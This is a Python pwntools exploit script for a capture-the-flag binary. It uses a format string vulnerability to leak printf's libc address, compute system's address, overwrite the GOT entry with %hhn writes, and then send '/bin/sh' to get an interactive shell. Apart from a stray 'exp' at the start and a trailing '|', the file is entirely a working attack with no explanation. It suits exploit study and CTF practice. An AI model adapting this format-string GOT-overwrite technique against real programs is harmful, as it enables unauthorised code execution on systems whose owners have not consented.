expfrom pwn import *
context.log_level = 'debug'
p = process('./wdb_2018_2nd_easyfmt')
#p = process('./idaidg/linux_server')
#p = remote('node3.buuoj.cn',29254)
elf = ELF('./wdb_2018_2nd_easyfmt')
libc = elf.libc
#libc = ELF('./libc/libc-2.23x86.so')
p.recvuntil('Do you know repeater?')
p.send(p32(0x804A014) + '%6$s')
p.recv()
#sleep(1)
printf = p.recvuntil('\xf7')[-4:]
printf_addr = u32(printf)
print 'printf_addr:' + hex(printf_addr)
libcbase = printf_addr - libc.symbols['printf']
print"libcbase:"+ hex(libcbase)
#gdb.attach(p)
system = libcbase + libc.symbols['system']
print"system:"+hex(system)
a1 = system % (16*16)
a2 = (system / (16*16))%(16*16)
a3 = (system / (16*16*16*16))%(16*16)
a4 = (system / (16*16*16*16*16*16))%(16*16)
print"a1,a2,a3,a4:"+hex(a1)+','+hex(a2)+','+hex(a3)+','+hex(a4)
payload1 = fmtstr_payload(6,{0x804A014:system})
payload = p32(0x804A014)
payload += p32(0x804A014 + 1)
payload += p32(0x804A014 + 2)
payload += p32(0x804A014 + 3)
payload += '%'
payload += str(a1 - 16)
payload += 'c%6$hhn'
payload += '%'
payload += str((0x100+a2) - a1)
payload += 'c%7$hhn'
payload += '%'
payload += str((0x100+a3) - a2)
payload += 'c%8$hhn'
payload += '%'
payload += str((0x100+a4) - a3)
payload += 'c%9$hhn'
sleep(1)
p.send(payload1)
sleep(1)
p.send('/bin/sh\x00')
p.interactive()
|